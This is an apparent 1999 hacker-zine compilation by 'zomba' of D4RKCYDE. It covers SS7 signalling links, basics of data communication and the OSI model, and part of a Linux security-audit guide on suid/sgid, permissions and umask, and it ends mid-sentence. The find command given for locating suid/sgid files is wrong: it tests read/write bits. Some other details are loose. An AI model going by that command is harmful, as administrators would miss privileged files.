Links (discussed later). Next you have STPs which completely run the show. They work on a much larger scale and route everything from a selectided Wide Area Network of WAN. Graphically it looks kind of like this. Local to Local Local to Regional Regional to Regional Regional to International International to International Regional to International Regional to Regional Local to Regional Local to Local II. SP: The SP of Singaling Point is a lot like a telephone number on the PSTN. In the case of SS7 they are called SPC or Signal Point Codes. Thus making a service with such a code a Signaling Point. At the same time SP is also considered a suffix to much larger grouping acronyms. You have the SSP, SCP, AND THE MSC. SSP- This is basically a branch of the SS7 network which offers voice connections. Which is part of a SS7 Telephone Network (SS7TN). SCP- This brach offers database services. Not really part of the whole scheme of things. MSC- This branch is in control of the mobile units which provide voice connections. III. Data Links: In the SS7 network you must send data of numerous types to other SPs and this is done through links. Basically they don't concern themselves with how they transmit the data, but more on what they are actually transmitting. Which then breaks this down further so you have several types of links. Which categorize each data type. (A) Access Links (B) Bridge Links (C) Cross Links (D) Diagonal Links (E) Extended Links (F) Fully Associated Links Access Links- These provide the link between the basic node and STP pairs. They are what opens the connection between the STP and keeps it up and running. Bridge Links- These are what more or less connect STPs on local to local networks. The more of these Bridge Links you have the more flexibility in routing the services through STPs you will have. Four of these links are required to connect all the linked STPs of one area to the STPs of another area. Cross Links- In the whole scheme of making sure one of the STPs of a pair doesn't get screwed up they don't have a way to provide service, you have Cross Links which connect two paired STPs together as so they are more able to communicate. In most cases the pair is doing the same task and this can also cause the pair to speed the overall performance. Diagonal Links- These are exactly like Bridge Links only that they connect the smaller network of local networks and STPs to a Regional STP which might have several of these smaller networks hooked to it. Just remember they are Bridge Links on steriods which connect Local to Regional. Extended Links- These again are nothing more than really large Bridge Links. Instead of hooking a STP pair to a regional to then another local STP pair these link them directly. Kind of like this. ______________Regional STP__________________ / \ / \ STP Pair 1----------Extended Link---------------STP Pair 2 Fully Associated Links- These occur when a company owns two or more nodes and wishes to connect them internatlly while avoiding a STP. This is only done when a company owns the two nodes and at no other time. Thus making the nodes assocciated through the same company which is why these links are called Associated Links... Ok, well that's it. If it thoroughly confused you, read it again. If you allready knew this crap good for you smart ass. Why don't you go learn something new now. I hope to put a more detailed article on Components of an SS7 Network up soon. -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::::[ Electronic Data Communication ]::[OO---------[ zomba ]---------- -->]OO[:::::::::::::::::::::::::::::::::::::::[ z0mba@hotmail.com ]---------- -->[OO]:::::::::::::::::::::::::::::::::::::::[ members.xoom.com/phuk ]:::::: --oOo--> Covered in this Article: ]------------------------ --oOo--> -------------------------------------------------- --oOo--> Introduction ]--- --oOo--> PRINCIPLE OF ELECTRONIC DATA COMMUNICATION ]--- --OoO--> ========================================== ]--- --oOo--> --> Communications Links ]--- --oOo--> --> Communications Media ]--- --oOo--> --> Modems ]--- --oOo--> --> Multiplexors ]--- --oOo--> COMMUNICATION METHODS ]--- --oOo--> ===================== ]--- --oOo--> --> Simplex/duplex Transmission ]--- --oOo--> --> Synchronous and Asynchronous Transmission ]--- --oOo--> --> Data transfer checks ]--- --oOo--> --> Circuit Switching ]--- --oOo--> --> Packet Switching ]--- --oOo--> --> Advantages of Packet Switching ]--- --oOo--> --> Data Compression ]--- --oOo--> --> Data Encryption ]--- --oOo--> --> The TCP/IP Protocol ]--- --oOo--> --> The ISO OSI seven-layer Model ]--- --oOo--> --> Bridges and Gateways/Routers ]--- Introduction --oOo------- This article is meant to give you, the ereet public, a brief insight into how data communications werk. The parts on TCP/IP and the ISO OSI seven-layer model were origionally part of a file I was writing for ETG (now defunct) but I thought they were relevant to this article and so have included them. If you have been using the net for a while then the OSI model will be instantly recognisable even if you've never seen it before as it is basically just how the internet protocols werk and their ports etc (ie: Telnet, port 23). A lot of this article was taken from other sources as they explained better than I ever could :) PRINCIPLE OF ELECTRONIC DATA COMMUNICATION ========================================== Data communication involves sending and receiving data from one computer or data processing device to another. Applications using for example e-mail, supermarket EPOS (Electronic Point-Of-Sale) terminals, cash dispensers, fax machines and video conferencing are all examples of this. When the devices are close together, for example in the same building, they can be linked by means of cables. However, when devices are seperated by more than a few hundred yards, data has to be sent over a communications link (eg. tele- phone line) and extra equipment such as a modem is required. Communications Links --oOo--------------- In the UK, BT, Mercury and other telcos provide services and data links. Telephone line may be either: --> public lines, on which the cost of sending data depends on the length of time taken; --> private or leased lines, for whiche there is a fixed annual fee and line can be used 24/7 with no extra cost. Communications Media --oOo--------------- Communication may take place over a combination of different media. --> twisted pair (copper cable), used in much of the PSTN; --> coaxial cable - high quality, well-insulated cable that can transmit data at higher speeds; --> fibre optic cable through which pulses of light, rather than electricity, are sent in digital form; --> communications satallite, using one of the hundreds of satellites now in geosynchronous orbit about 22,000 miles above the Earth (for all you l4m3rs, geosynchronous means that they are rotating at the same speed as the Earth and are therefore stationary relative to it); --> microwave - similar to radio waves. Microwave stations cannot be much more than 30 miles apart because of the Earths curvature as microwaves travel in straight lines. The amount of data that can be sent over the line depends partly on the bandwidth, which is the range of frequencies that the line can carry. The greater the bandwidth, the greater the rate at which data can be sent, as several messages can be transmitted simultaneously. A network that is capable of sending voice, video and computer data is called an 'integrated services digital network' (ISDN), and this requires a high bandwidth. Modems --oOo- Telephone lines were origionally designed for speech, which is transmitted in analogue or wave form. In order for digital data to be sent over a telephone line, it must first be converted to analogue form and then converted back to digital at the other end. This is achieved by means of a modem (MOdulator DEModulator) at either end of the line. Digital Signal Digital Signal \ / \ Analogue Signal / Computer------Modem--------------------------------Modem------Computer Multiplexors --oOo------- A multiplexor combines more than one input signal into a stream of data that can be transmitted over a single communications channel. This means, for example, that a local area network of 48 PC's could all communicate with a mainframe at some geographically remote head office via a single leased line attached to a multiplexor. At the mainframe end, there is likely to be a front-end processor which will handle the communications, leaving the main processor free for other tasks. Computer\ \ ___ Mini \ / mainframe Computer---Multiplexor---Modem------------------Modem---Multiplexor---- -or- / \___ front-end / processor Computer/ COMMUNICATION METHODS ===================== Simplex, half-duplex and full-duplex transmission --oOo-------------------------------------------- There are three possible modes of transmission: --> Simplex - transmission can take place only in one direction. This type of transmission could be used for example when the sending device such as a temperature sensor never requires a response from the computer. --> Half-duplex - transmission can take place in both directions but not simultaneously. This type of transmission is often used between a central computer and terminals. --> Full-duplex - transmission can take place in both directions simultaneously. It is suitable for interactive computer applications. Synchronous and Asynchronous transmission --oOo----------------------------------- With asynchronous transmission, one character at a time is sent, with each character being preceded by a start bit and followed by a stop bit. A parity bit is also usually included as a check against incorrect transmission. This type of transmission is usually used by PC's, and is fast and economical for relatively small amounts of data. In Synchronous transmission mode, timing signals (usually the computers internal clock) control the rate of transmission and there is no need for start and stop bits to accompany each character. Mainframe computers usually use synchronous transmission. It is less error-prone than asynchronous transmission. Data Transfer Checks --oOo--------------- The following checks may be made during data transmission: --> parity checks - an extra bit is transmitted with each character to make the number of bits set to 1 even (for even parity) or odd for (odd parity). --> checksum - may be sent with each block of data transmitted. All the elements in the block (eg: words or bytes) are added together (ignoring overflow) to produce a single element known as the checksum, and this is stored and transmitted with the block, and checked on receipt. Circuit Switching --oOo------------ An excellent example of circuit switching is the public telephone system which uses circuit- switched paths. When a caller dials a number, the path between the two telephones is set up by operating switches in all of the exchanges involved in the path, and the circuit is set up and held for the entire duration of the call (even through periods of silence). This allows the two people on the phone ('leeto phreaks!)to hold a conversation with no waiting at either end. ph0ne____________ \ \ / \ \ / ph0ne____________Local Exchange--------Trunk Exchange / / | \ / / | \ / ph0ne____________/ | \__Trunk Exchange---- | / / _________/ / / Trunk Exchange ph0ne ph0ne_______ ___________/ \__________ / \ / \ / Local Exchange Local Exchange / | \ \ / | \ \ph0ne ph0ne ph0ne \__ph0ne Packet Switching --oOo----------- In a packet switching system (PSS) data is divided into packets - fixed length blocks of data say 128 bytes. As well as the data, each packet also carries: --> the source and destination address; --> a packet sequence number so that the whole message can be correctly reassembled; --> a checksum (longitudinal parity check) for the purpose of error checking. The PSS takes the form of a computer network in which each computer redirects packets it receives to the next computer along an appropriate route to its destination. Advantages of packet switching --oOo------------------------- --> More efficient use of lines is possible. --> Cost depends only on the number of packets sent not on distance, so all data is transmitted at local call rates. --> It is less likely to be affected by network failure because of the multiple routes available to transmit data packets. --> Security is better; data is less likely to be intercepted because the packets may be sent along different routes or be interleaved with the other unrelated packets. Data Compression --oOo----------- Data compression is frequently used when transmitting large quantities of data, thereby reducing the number of blocks transmitted and hence the cost. It basically works by replacing repeated blocks by one copy of the byte plus a count of the repetitions. Data Encryption --oOo---------- Data encryption is used for security purposes when transmitting or storing confidential data. The data to be transmitted is encoded using a mathematical algorithm or substitution of letters, so that even if it is intercepted it cannot be read. w0rd to the OfKIZk\$5zG w0rd to the darkcyde ---> ENCRYPTION --> OPbNd5%6&#S --> DECRYPTION --> darkcyde collective WeDgNC$�1GG8 collective Plaintext Ciphertext Plaintext The TCP/IP Protocol --oOo-------------- Basically, TCP/IP is a set of protocols developed around the ARPAnet (where the internet began - just in case you didn't know!) which allows co-operating computers to share resources across a network. The most accurate name for this set of protocols is the 'Internet Protocol Suite' - TCP and IP are just two of the protocols in this suite. Due to the fact that TCP and IP are the best known of all the protocols, they have been joined to create the most common term - TCP/IP. TCP/IP protocols map to a four layered conceptual model: Applications, Transport, Internet, and Network Interface. Each layer on the TCP/IP model corresponds to one or more layers on the International Standards Organisation (ISO) seven-layer Open Systems Interconnection (OSI) model which I will go into more detail on later in the file. Below I have attempted to draw a diagram to shows this. OSI Model TCP/IP Model |--------------| |-----------------| | Application | | | |--------------| | | | Presentation | | Application | |--------------| | | | Session | | | |--------------| |-----------------| | Transport | | Transport | |--------------| |-----------------| | Network | | Internet | |--------------| |-----------------| | Data-link | | | |--------------| |Network Interface| | Physical | | | |--------------| |-----------------| Defined within the four layers of TCP/IP are protocols that dictate how computers connect and communicate. The most common of these are Transmission Control Protocol (TCP), User Datagram Protocol (UDP), Internet Protocol (IP), Address Resolution Protocol (ARP), and Internet Control Message Protocol (ICMP). Transmission Control Protocol (TCP) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is the most common higher-level protocol in the suite. TCP guarantees the delivery of packets, ensures proper sequencing of data, and provides a checksum feature that validates both the packet header and its data for accuracy. If the network either corrupts or loses a TCP packet during transmission, TCP is responsible for re-transmitting the faulty packet. This level of reliability makes TCP the protocol of choice for session-based data transmission, client- server applications, and critical services such as email. This reliability however has its downfalls - TCP headers require additional bits to provide proper sequencing of information, as well as a mandatory checksum to ensure reliabilty of both the TCP packet header and the packet data. To guarantee successful data delivery, the protocol also requires that the recipient acknowledge successful receipt of data. Such acknowledgements (ACK's) generate additional network traffic, thus diminishing the rate at which data passes. To reduce the impact on performance, most hosts send an acknowledgement for every other segment or when a specified time interval has passed. User Datagram Protocol (UDP) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If reliability is not totally essential then UDP, a TCP compliment, offers a connectionless datagram service that guarantees neither delivery nor correct sequencing of delivered packets (much like IP). Higher-level protocols or applications might provide reliability mechanisms in addition to UDP/IP. UDP data checksums are optional, providing a way to exchange data over highly reliable networks without unnecessarily consuming network resources or processing time. When UDP checksums are used, they validate both the integrity of the header and the data. ACKs are not enforced by the UDP protocol, this is left to higher-level protocols. UDP also supports sending data from a single sender to multiple receivers. Internet Protocol (IP) ~~~~~~~~~~~~~~~~~~~~~~ IP provides packet delivery for all other protocols within the suite. It provides a best-effort, connectionless delivery system for computer data. They are not guaranteed to be delivered nor received in the order they are sent as the protocols checksum feature only confirms the headers integrity. The responsibitly of the data contained in the IP packets are only insured by using higher-level protocols Address Resolution Protocol (ARP) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ARP is not directly related to data transport but is very important nonetheless. ARP is one of the maintenance protocols that supports the TCP/IP suite and is usually invisible to users and applications. If two systems are to communicate over a TCP/IP network, the system sending tha packet must map the IP address of the final destination to the physical address of the final destination. IP acquires this physical address by broadcasting a special inquiry packet (an ARP request packet) containing the IP address of the destination system. All ARP-enabled systems on the local IP network detect these broadcast messages, and the system that owns the IP address in question replies by sending its physical address to the requester (in an ARP reply packet). The physical/IP address is then stored in the ARP cache of the requesting system for subsequent use. Because the ARP reply can also be broadcast to the network, other systems on the network can use this information to update their own ARP caches. (you can use the 'arp' utility to view the ARP tables) Internet Control Message Protocol (ICMP) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ICMP is another of the maintenance protocols. It allows two systems on an IP network to share status and error info. This information is often used by network admins to detect network trouble or recover from transmission problems. ICMP packets are stored within IP packets and are not really considered to be a higher-level protocol. The 'ping' utility uses the ICMP echo request and echo reply packets to determine whether a particular IP system on a network is functional. Because of this, the ping utility is useful for diagnosing IP networks or router failures. The ISO OSI seven-layer Model --oOo------------------------ The seven layers of the Open System Interconnection (OSI) model are shown in my diagram below. The reason for the model was to try and introduce some standardisation into the protocols of network communication. |-----(7)-----|-----(6)----|---(5)----|----(4)-----|---(3)----|----(2)----|----(1)----| | Application |Presentation| Session | Transport | Network | Data Link | Physical | |-------------|------------|----------|------------|----------|-----------|-----------| |-------------|------------|----------|------------|----------|-----------|-----------| | Email | POP/SMTP | POP/25 | | | |RS-X, CAT 1| |-------------|------------|----------| | | |-----------| | Newsgroups | Usenet | 532 | | | | ISDN | |-------------|------------|----------| | | SLIP, PPP |-----------| | Web | HTTP | 80 | | | | ADSL | |Applications | | | | | | | |-------------|------------|----------|Transmission| Internet | |-----------| |File Transfer| FTP | 20/21 | Control | Protocol | | ATM | |-------------|------------|----------| Protocol | Version 6|-----------|-----------| |Host Sessions| Telnet | 23 | | | | |-------------|------------|----------| | |-----------|-----------| | Directory | DNS | 53 |------------|----------| | FDDI | | Services | | | | |802.2 SNAP |-----------| |-------------|------------|----------| | | | CAT 1-5 | | Network Mgt.| SNMP | 161/162 | User | Internet |-----------|-----------| |-------------|------------|----------| Datagram | Protocol | | Coaxial | |File Services| NFS | RPC | Protocol | Version 4|Ethernet II| Cable | | | |Portmapper| | | | | |-------------|------------|----------|------------|----------|-----------|-----------| By looking at the model in this way you will probably find that you are familier with the concept even if you have never seen it before as most pople know at the very least things like port 80 is for HTTP and 23 for Telnet etc. The OSI model was introduced to describe how messages should be transmitted between two computers on a network so that product implementors could produce products that would consistently work with each other. The idea is that messages are only transmitted in the physical layer, if the message is received by a host that is not the target then it will not proceed up the layers, it will just be passed on. The top four layers (4,5,6,7) are known as the 'upper layers' and the bottom three layers (1,2,3) are known as the 'lower layers'. The upper layers are used whenever a message passes from or to a user. The lower layers are used whenever a message passes through a host computer. Layer 7: Application Layer ~~~~~~~~~~~~~~~~~~~~~~~~~~ This is the layer at which communication partners are identified, quality iof service is identified, user authenticity and privacy are considered, and any constraints on data syntax are identified. They are /not/ the actual applications themselves, but having said that, some applications perform application layer functions. Layer 6: Presentation Layer ~~~~~~~~~~~~~~~~~~~~~~~~~~~ This layer is usually a part of the operating system. It converts incoming and outgoing data from one presentation format to another ie. ASCII to EBCDIC. It is sometimes called the syntax layer. It also handles encryption and compression of data. Layer 5: Session Layer ~~~~~~~~~~~~~~~~~~~~~~ This layer basically sets up, co-ordinates and terminates conversations, exchanges and dialogs between the application at each end. It deals with session and connection co-ordination. It allows application processes to register unique addresses, such as NetBIOS names. It also has some other support functions inclusing user authentication and resource-access security. Layer 4: Transport Layer ~~~~~~~~~~~~~~~~~~~~~~~~ This layer manages the end-to-end control ie: determining whether all packets have arrived. It also deals with error checking to ensure complete data transfer. Layer 3: Network Layer ~~~~~~~~~~~~~~~~~~~~~~ This layer handles the routing of the data ie: sending it in the right direction to the right destination on outgoing transmissions and receiving incoming transmissions at the packet level. It basically deals with routing and forwarding. It control subnet traffic to allow intermediate systems to instruct a sending station not to transmit its frame when the router's buffer is full. If the router is busy, the network layer can instruct the sending station to use an alternate router. Layer 2: Data Link Layer ~~~~~~~~~~~~~~~~~~~~~~~~ This layer provides error control and synchronisation for the physical level and does bit-stuffing for strings of 1's in excess of 5. It furnishes 'transmission protocol' knowledge and management. It establishes and terminates a logical link (virtual-circuit connection) between two computers identified by their unique network interface card (NIC) addresses. Layer 1: Physical Layer ~~~~~~~~~~~~~~~~~~~~~~~ This layer conveys the bit-stream through the network at the electrical and mechanical level. It provides the hardware means of sending and receiving data on a carrier. Data-encoding modefies the digital-signal pattern (1s and 0s) used by the computer to better accommodate the characteristics of the physical medium and to assist in bit and frame synchronisation. Data-encoding resolves which signal pattern represents a binary 1, how the receiving station recognises when a 'bit-time' starts and how the receiving station delimits a frame. Bridges and Gateways/Routers --oOo----------------------- A bridge is a connection between two local area networks. Wide area networks may be connected throught a system of routers/gateways, a gateway being a computer which acts as a point of connection between different networks. Shouts and Greetz --oOo------------ The usual peeps: Werd to the darkcyde collective, extra shouts to hybrid, bodie and force. Also greetz to [JaSuN], darkflame, xio, PUBLiC NUiSANCE, shadow, gossi, elf, downtime, kryptus. L8r. -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::[ Linux System Security ]::[OO--[ by zomba ]------------------------ -->]OO[::::::::::::::::::::::::::::::::::[ z0mba@hotmail.com ]::::::::::::::: -->[OO]::::::::::::::::::::::::::::::::::[ members.xoom.com/phuk ]::::::::::: ***************************************************************************** ************************** D4RKCYDE present (1999) ************************** ***************************************************************************** --oOo--> Covered in this Article: ]------------------- --oOo--> --------------------------------------------- --oOo--> Introduction ]--- --oOo--> Thinking up a Security Audit ]--- --oOo--> Part 1: The Plan ]--- --oOo--> Part 2: The Tools ]--- --oOo--> Part 3: Knowledge Gathering ]--- --oOo--> suid and sgid ]--- --oOo--> How to find suid and sgid files ]--- --oOo--> Setting suid and sgid ]--- --oOo--> File and Directory Permissions ]--- --oOo--> : Files ]--- --oOo--> : Directories ]--- --oOo--> How suid and sgid fit into this picture ]--- --oOo--> The default mode for a file or directory ]--- --oOo--> Passwords: A second look ]--- --oOo--> Related WWW sites ]--- Introduction --oOo------- In this phile you will learn how to protect your box from those nasty hacker- type people, which more often than not will be your online buddies :] When your thinking about your system security you have to remember that your system is as secure as its weakest point. Now, this is an old saying but it has a lot of truth in it, its like locking all your windows to stop intruders but leaving the back-door unlocked. Read on... Thinking up a Security Audit --oOo----------------------- There are three basic parts to a security audit: o--> The Plan - (ie: a set of security apects to be evaluated) o--> The Tools - (ie: what tools are available to you to assist in evaluating the security aspects) o--> Knowledge Gathering - (ie: finding out the ways in which your system can be attacked, this includes physical security issues, learning about he system itself and much much more) Part 1: The Plan --oOo----------- Now the plan doesn't really have to be anything more than a quick scribble on a bit of paper that details what you are going to do. It should though, revolve around two basic questions: o--> What types of security problems could I have? o--> Which ones can I attempt to fix? In order to answer these questions, you may have to find out a bit more about several areas of your system, these include: o--> Accountability o--> Change control and tracking o--> Data integrity, including backups o--> Physical security o--> Privacy of Data o--> System access o--> System availability Okay werd, so now you have a more detailed description of what you want to achieve you can write up a more complex plan. As always, there will be trade- offs. For example, privacy of data could mean that only certain people can log into your box, which affects system access for the users. System availibility is always in contention with the change control. For example, when do you change that failing hard-drive on a 24/7 system? What i'm trying to get at here is that the detailed plan that is developed should include a set of goals; a way of tracking the progression of the goals, including changes to the system; and a knowledge base of what types of tools are needed to do the job. Part 2: The Tools --oOo------------ Okay, so now you should have a fair idea of what you want to do, now you have to think about *how* you are going to do it. A number of tewls are available on the internet, including tools to check passwords, check system security, and protect your system. CERT, CIAC, and the Linux Emergancy Response Team are often good sources of information for both the beginner and advanced sysadmin. The following is a list of tools, all freely available if you look for them, make sure you look around for some other tools as well though! --> cops [ A set of programs; each checks a different aspect ] [ of security on a *nix system. If any potential ] [ security holes do exist, the results are either ] [ mailed or saved to a report file. ] --> crack [ A program designed to find standard *nix eight- ] [ character DES-encrypted passwords by standard ] [ guessing techniques. ] --> deslogin [ A remote login program that can be used safely ] [ across insecure networks. ] --> findsuid.tar.Z [ Finds changes in setuid (set user ID) and setgid ] [ (set group ID) files. ] --> finger daemon [ Secure finger daemon for *nix. Should compile out-] [ of-the-box nearly anywhere. ] --> freestone [ A portable, fully functional firewall ] [ implementation. ] --> gabriel [ A satan detector. gabriel gives the sysadmin an ] [ early warning of possible network intrusions by ] [ detecting and identifying satan's network probe. ] --> ipfilter [ A free packet filter that can be incorperated into] [ any of the supported operating systems, providing ] [ IP packet-level filtering per interface. ] --> ipfirewall [ An IP packet filtering tool, similar to the packet] [ filtering facilities provided by most commercial ] [ routers. ] --> kerberos [ A network authentication system for use on ] [ physically insecure networks. It allows entities ] [ communicating over a network to prove their ] [ identities to each other while preventing eves- ] [ dropping or replay attacks. ] --> merlin [ Takes a popular secur1ty tewl (such as tiger, ] [ tripwire, cops, crack, or spi) and provides it ] [ easy-to-use, consistent graphical interface, ] [ simplifying and enhancing its capabilities. ] --> npasswd [ passwd replacement with password sanity check. ] --> obvious-pw.tar.Z [ An obvious password detector. ] --> opie [ Provides a one-time password system for POSIX- ] [ compliant UNIX-like operating systems. ] --> pcheck.tar.Z [ Checks formats of /etc/passwd; verifies root ] [ default shell and passwd fields. ] --> Plugslot Ltd. [ PCP/PSP UNIX network security and configuration ] [ monitor. ] --> rsaeuro [ A cryptographic tewl-kit providing various ] [ functions for the use of digital signatures, data ] [ encryption, and supporting areas (PEM encoding, ] [ random number generation, and so on). ] --> rscan [ Allows sysadmins to execute complex (or simple) ] [ scanner scripts on one (or many) machines and ] [ create clean, formatted reports in either ASCII or] [ HTML. ] --> satan [ The secur1ty analysis tewl for auditing networks. ] [ In its simplest (and default) mode, it gathers as ] [ much information about remote hosts and networks ] [ as possible by examining such network services ] [ such as finger, NFS, NIS, ftp and tftp, rexd, and ] [ many others. ] --> ssh [ Secure shell - a remote login program. ] --> tcp wrappers [ Monitor and control remote access to your local ] [ tftp, exec, ftp, rsh, telnet, rlogin, finger and ] [ systat daemon. ] --> tiger [ Scans a system for potential secur1ty problems. ] --> tis firewall toolkit [ Includes enhancements and bug fixes from V1.2, and] [ new proxies for HTTP/Gopher and X11. ] --> tripwire [ Monitors system for secur1ty break-in attempts. ] --> xp-beta [ An application gateway of X11 protocol. It is ] [ designed to be used at a site that has a firewall ] [ and uses SOCKS and/or CERN WWW Proxy. ] --> xroute [ Routes X packets from one machine to another. ] All of the above tools will be available from my website: members.xoom.com/phuk when it is finally finished and online. Part 3: Knowledge Gathering --oOo---------------------- There is not really that much to say about knowledge gathering other than to make sure you find out whether or not the system users and the keepers of the sacred root password (hopefully just yourself) all follow the security procedures that you have put into place - and that they gather all the knowledge necessary to do so. One of the major points of this is that you don'r use that same passwords for everything, for example, I know someone whose password is a variation of his name, he uses this password for *everything*, ISP accounts, web email services, he even used to spell it out numerically for his VMB pass. If you do this now, then DON'T, it may be safe to use as the root password because it is hard for someone to find it out but if they find out your pwd for something less secure that just happens to be the same pass for root, then you are fux0red. File secur1ty is another big issue. The use of umask (file creation masks) should be mandated. It should also be set to the maximum amount possible. It is easy to change a particular file to give someone else access to it. It is difficult, if not impossible, to know who is looking at your files. The sensitivity of your data, of course, would certainly determine the exact level of security placed on the file. In extremely sensitive cases, such as all your h/p related files, it should also be encrypted (make sure you use a lengthy pass-word as well, mine is a 34 character sentance containing random upper/lower case letters and numbers, which I have memorised). It might also be a good idea to occasionally search for programs that have suid or sgid capability. suid and sgid --oOo-------- Many people talk about suid (set user ID) and sgid (set group ID) without really knowing that much about them. The basic concept behind them is that a program (not a script) is set so that it is run as the owner or group set for the program, not the person running the program. For example, say you have a program with suid set, and its owner is root. Anyone running that program runs the program with the persmissions of the owner instead of his or her own permissions. The passwd command is a good example of this. The file /etc/passwd is writable by root, and readable by everyone. The passwd program has suid turned on. Therefore, anyone can run the program and change their password. Because the program is running as the user root, not the actual user, the etc/passwd file can be written to. The same concept is true of sgid. Instead of the program running with the permissions and authority of the group associated with the person calling the program, the program is run with the permissions and authority of the group that is associated with the program. How to find suid and sgid files --oOo-------------------------- Using the find command, you can search the entire system looking for programs with their suid or sgid turned on: find / -perm -200 -o -perm -400 -print A good idea is to run the above command when you first load a system, saving its output to a file readable only by root. Future searches can be performed and compared to this "clean" list of suid and sgid files. This way you can insure that only the files that should have these permissions actaully do. Setting suid and sgid --oOo---------------- The set user ID and set group ID can be powerful tools for giving the users the ability to perform tasks without the other problems that could arise with the user having the actual permissions of that group or user. However, these can be dangerous tools too. When considering changing the permissions on a file to be either suid or sgid, keep in mind these two things: o--> Use the lowest permissions needed to accomplish a task. o--> Watch for back doors. Using the lowest permissions means not giving a file an suid of root if at all possible. Often, a less priveleged person can be configured to do the task. The same goes for sgid. Many times, setting the group to the appropriate non-sys group will accomplish the same task while limiting other potential problems. Back doors/Trojans come in many forms. A program that allows a shell is a back door. A program that has multiple entrances and exits are back doors. Keep in mind that if a user can run an suid program set to root and the program contains a back door (the user can get out of the program to a prompt without actually exiting the program), then the system keeps an effective user ID as what the program is set to (ie: root), and the user now has root permissions. With that said, how do you set a file to have the effective user be the owner of the file, or the effective group be the group of the file, instead of running as the user ID or the users group ID of the person invoking the file? The permissions are added with the chmod command, as follows: chmod u+s file(s) chmod g+s file(s) The first example sets suid for the file(s) listed. The second example sets the sgid of the file(s) listed. Remember, suid sets the effective ID of the process to the owner associated with the file, and sgid sets the effective groups ID of the process to the group associated with the file. These cannot be set on non-executables. File and Directory Permissions --oOo------------------------- File and directory permissions are the basics for providing security on a system. These, along with the authentication system, provide the basis for all security. Unfortunately, many people do not know what permissions on directories mean, or they assume they mean the same thing they do on files. The following section describes the permissions on files; after that, the permissions on directories are described. Files --o-- The permissions for files are split into three different sections: the owner of the files, the group associated with the file, and everyone else (the w0rld). Each section has its own set of file permissions. These permissions provide the ability to read, write, and execute (or, of course, to deny the same). These permissions are called a files 'filemode'. Filemodes are set with the chmod command. There are two ways to specify the permissions of the object. You can use the numeric coding system or the letter coding system. Using the letter coding system, the three sections are referred to as 'u' for user, 'g' for group, and 'o' for other, or 'a' for all three. There are three basic types of permissions: 'r' for read, 'w' for write or 'x' for execute. Combinations of r, w and x with the three groups provide the permissions for files. In the following example, the owner of the file (me) has read, write, and execute permissions, while everyone else has read access only. shell:/home/zomba$ ls -l 0d4yz -rwxr--r-- 1 zomba users 10 May 21 48:32 0d4yz The command ls -l tells the computer to give you a long (-l) listing (ls) of the file (0d4yz). The resulting line is shown in the second code line, and it tells you a number of things about the file. First, it tells you the permissions. Next it tells you how many links the file has. It then tells you who owns the file (zomba) and what group is associated with the file (users). Following the ownership section, the date and timestamp for the last time the file was modefied is given. Finally, the name of the file is listed (0d4yz). The permissions are actually made up of four sections. The first section is a single character that identifies the type of object that is listed out, these can be: - Plain File b Block special file c Character special file d Directory l Symbolic link p Named pipe s Socket Following the file type identifier are the three sets of permissions: rwx (owner), r-- (group), r-- (other). Directories ----oo----- The permissions on a directory are the same as those used by files: read, write and execute. The actual permissions, though, mean different things. For a directory, read access provides the ability to list the names of the files in that directory. It does not allow the othet attributes to be seen (owner, group, size, and so on). Write access provides the ability to alter the directory contents. This means that the user could create and delete files in the directory. Finally, execute access lets the user make the directory the current directory. As I stated earlier, the permissions can also be manipulated with a numeric coding system. The basic concept is the same as the letter coding system. As a matter of fact, the permissions look exactly alike. The difference is that way the permissions are identified. The numeric system uses binary counting to determine the value for each permission and sets them. Also, the find command can accept the permissions as an argument using the -perm option. In this case, the permissions must be given in their numeric form. With binary, you count from the right to the left. Therefore, if you look at a file, you can easily come up with its numeric coding system value. The following file has full permissions for the owner and read permissions for the group and the world: shell:/home/zomba$ ls -la 0clue -rwxr--r-- 1 zomba users 10 May 22 00:12 0clue This would be coded as 744, the table below shows how this was formed. Permission Value Read 4 Write 2 Execute 1 Permissions use an additive (if thats a word) process. Therefore, a person with read, write, and execute permissions to a file would have 7 (4+2+1). Read and execute would have a value of 5. Remember, there are three sets of values, so each section would have its own value. The following table shows both the numeric system and the character system for the permissions: Permission Numeric Character Read-only 4 r-- Write-only 2 -w- Execute-only 1 --x Read and write 6 rw- Read and execute 5 r-x Read, write and execute 7 rwx Permissions can be changed using the chmod command. With the numeric system, the chmod command must be given the value of all three fields. Therefore, to change a file to read, write, and execute by everyone, the following command would be issued: $ chmod 777 To perform the same task with the character system, the following command would be issued: $ chmod a+rwx Of course, more than one type of permission can be specified at any one time. The following command adds write access for the owner of the file, and adds read and execute access to the group and everyone else: $ chmod u+w,og+rx The advantage that the character system provides is that you do not have to know what the previous permissions are. You can selectively add or remove permissions without worrying about the rest. With the numeric system, each section of users must always be specified. The downside of the character system is when complex changes are being made. Looking at the preceding example (chmod u+w,og+rx ), it might have been easier to use the numeric system and replace all those letters with three numbers: 755. How suid and sgid fit into this picture --oOo---------------------------------- The special purpose access modes suid and sgid add an extra character to the picture. Before looking at what a file looks like with the different special access modes, take a look at the table below for the identifying characters for each of the modes. Code Name Meaning s suid Sets process user ID on execution s sgid Sets process group ID on execution suid and sgid are used on executables. Therefore, the code is placed where the code for the executable would normally go. The following file has suid set: $ ls -la w0rd -rwsr--r-- 1 zomba users 10 May 22 00:22 w0rd The difference between the suid being set and the sgid being set is the placement of the code. The same file with sgid active would look like this: $ ls -la w0rd -rwxr-sr-- 1 zomba users 10 May 22 00:22 w0rd To set the suid with the character system, the following command would be executed: $ chmod u+s To set the sgid with the character system, the following command would be executed: $ chmod g+s To set the suid and the sgid using the numeric system, you will have to use these two commands: $ chmod 2### $ chmod 4### In both instances, the ### is replaced with the rest of the values for the permiss-ions. The additive process is used to combine permissions; therefore, the following command would add suid and sgid to a file: $ chmod 6### The default mode for a file or directory --oOo----------------------------------- The default mode for a file or directory is set with the umask. The umask uses the numeric system to define its value. To set the umask, you must first determine the value that you want the files to have. For example, a common file permission set is 644. The owner has read and write permissions and the rest of the world has read permission. After the value is determined, then it is subtracted from 777. Keeping the same example of 644, the value would then become 133. This value is the umask value. Typically, this value is placed in a system file that is read when a user first logs on. After the value is set, all files created 